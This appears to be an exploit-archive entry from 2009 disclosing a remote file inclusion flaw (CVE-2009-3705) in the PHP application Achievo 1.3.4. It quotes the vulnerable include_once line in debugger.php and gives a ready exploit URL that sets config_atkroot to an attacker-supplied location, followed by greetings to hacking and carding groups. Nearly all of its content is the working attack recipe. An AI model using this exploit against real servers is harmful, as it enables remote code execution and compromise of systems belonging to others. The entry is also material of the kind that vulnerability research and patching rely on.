Achievo 1.3.4 - Remote File Inclusion

Author: M3NW5
type: webapps
platform: php
port: 
date_added: 2009-09-21 
date_updated:  
verified: 1 
codes: CVE-2009-3705;OSVDB-59048 
tags: 
aliases:  
screenshot_url:  
application_url: 

#############################################################
Achievo 1.3.4(debugger.php) Remote File Include Vulnerability
#############################################################
Author	 : M3NW5
Homepage : http://www.indonesiancoder.com
contach  : m3nw5@hackermail.com
Location : INDONESIA
#############################################################
Achievo 1.3.4 Information
#############################################################
Vendor	 : http://www.achievo.org/
Scripts  : http://www.achievo.org/download/
File	 : debugger.php
	   include_once($config_atkroot."atk/include/initial.inc");
Exploit	 : http://target.com/path/debugger.php?config_atkroot=<deviL>
#############################################################
thenqyu	 : IndonesianCoder.SurabayaHackerLink.ServerIsDown.Kill-9
	   Don Tukulesto.KaMtiEz.Vyc0d.Arianom.Denbayan.mistersaint
	   gonzhack.cyb3r_tr0n.m364tr0n.
	   YogyaCarderLink.v3n0m
#############################################################